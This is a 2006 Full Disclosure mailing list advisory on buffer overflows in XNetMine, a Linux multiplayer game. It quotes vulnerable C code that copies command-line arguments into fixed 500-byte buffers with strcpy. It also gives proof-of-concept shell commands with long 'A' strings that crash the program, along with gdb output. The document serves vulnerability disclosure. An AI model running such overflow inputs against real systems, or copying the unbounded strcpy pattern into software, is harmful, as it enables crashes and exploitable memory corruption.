Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

XNetMine (no version) multiple buffer overflow.

From: Federico Fazzi <federico () autistici org>
Date: Wed, 18 Oct 2006 13:18:51 +0200
//

Vendor: Martin Bauer
Software: http://ibiblio.org/pub/Linux/games/multiplayer/XNetMine.tgz

*Vulnerable code:*
--
line: 672/676

 if (strncmp("-PortNumber",argv[t+1],11)==0)
{ char text[500];
  strcpy(text,argv[t+1]);
  strcpy(Port,&text[11]);
}
--
line: 677/682

if (strncmp("-Name",argv[t+1],5)==0)
{
  char text[500];
  strcpy(text,argv[t+1]);
  strcpy(User,&text[5]);
}
--
line: 683/688

 if (strncmp("-ServerName",argv[t+1],11)==0)
{
  char text[500];
  strcpy(text,argv[t+1]);
  strcpy(ServerName,&text[11]);
}
--

*Proof of concept:*
--
federico XNetMine % ./XNetMine -Server -PortNumber`perl -e 'print "A"x498'`
Server:1094795585 Client:0 PortNum:AAAAAAAAAAAAAAAAAAAAAAAAAAA(...) ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)" 
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name`perl -e 'print "A"x504'`
Server:1  Client:0  PortNum:AAAAAAAAAAAAAAAAAAAAAAAA
Name:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"  ServerName:""
Segmentation fault

federico XNetMine % ./XNetMine -Server -PortNumber31337 -Name31337 -ServerName`perl -e 'print "A"x504'`
Server:1  Client:0  PortNum:31337
Name:"31337"  ServerName:"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA(...)"
Segmentation fault
--

*Debug information:*
--
(gdb) p $eip
$1 = (void (*)()) 0x804a862 (gdb) stepi 
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
SIGSEGV 0x0804a862 in main ()

-- federico
federico () plugs it / http://defsol.plugs.it/

//

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: